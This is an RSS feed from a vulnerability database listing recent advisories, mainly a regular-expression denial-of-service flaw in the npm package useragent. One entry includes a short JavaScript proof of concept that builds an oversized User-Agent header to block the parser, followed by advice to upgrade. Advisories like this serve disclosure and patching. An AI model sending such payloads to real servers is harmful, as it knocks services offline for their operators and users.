<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 10 Oct 2026 00:12:14 +0000</lastBuildDate>
    <item>
      <title>cnvd-2018-25045</title>
      <link>https://cve.radiocsirt.org/vuln/cnvd-2018-25045</link>
      <description>cnvd-2018-25045</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cnvd-2018-25045</guid>
    </item>
    <item>
      <title>EUVD-2026-178481</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-178481</link>
      <description>EUVD-2026-178481</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-178481</guid>
    </item>
    <item>
      <title>fkie_cve-2017-16030</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2017-16030</link>
      <description>&lt;p&gt;Useragent is used to parse useragent headers. It uses several regular expressions to accomplish this. An attacker could edit their own headers, creating an arbitrarily long useragent string, causing the event loop and server to block. This affects Useragent 2.1.12 and earlier.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Useragent is used to parse useragent headers. It uses several regular expressions to accomplish this. An attacker could edit their own headers, creating an arbitrarily long useragent string, causing the event loop and server to block. This affects Useragent 2.1.12 and earlier.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2017-16030</guid>
    </item>
    <item>
      <title>GHSA-pjmx-9xr3-82qr — ReDoS via long UserAgent header in useragent</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-pjmx-9xr3-82qr</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: useragent&lt;/p&gt;
&lt;p&gt;Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.&lt;/p&gt;
&lt;p&gt;## Proof of Concept
```js
var useragent = require(&amp;#39;useragent&amp;#39;);&lt;/p&gt;
&lt;p&gt;var badUserAgent = &amp;#39;MSIE 0.0&amp;#39;+Array(900000).join(&amp;#39;0&amp;#39;)+&amp;#39;XBLWP&amp;#39;;
var request = &amp;#39;GET / HTTP/1.1\r\nUser-Agent: &amp;#39; + badUserAgent + &amp;#39;\r\n\r\n&amp;#39;;
console.log(useragent.parse(request));
```&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to version 2.1.13 or later.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: useragent&lt;/p&gt;
&lt;p&gt;Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.&lt;/p&gt;
&lt;p&gt;## Proof of Concept
```js
var useragent = require(&amp;#39;useragent&amp;#39;);&lt;/p&gt;
&lt;p&gt;var badUserAgent = &amp;#39;MSIE 0.0&amp;#39;+Array(900000).join(&amp;#39;0&amp;#39;)+&amp;#39;XBLWP&amp;#39;;
var request = &amp;#39;GET / HTTP/1.1\r\nUser-Agent: &amp;#39; + badUserAgent + &amp;#39;\r\n\r\n&amp;#39;;
console.log(useragent.parse(request));
```&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to version 2.1.13 or later.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-pjmx-9xr3-82qr</guid>
    </item>
    <item>
      <title>gsd-2017-16030</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2017-16030</link>
      <description>gsd-2017-16030</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2017-16030</guid>
    </item>
  </channel>
</rss>
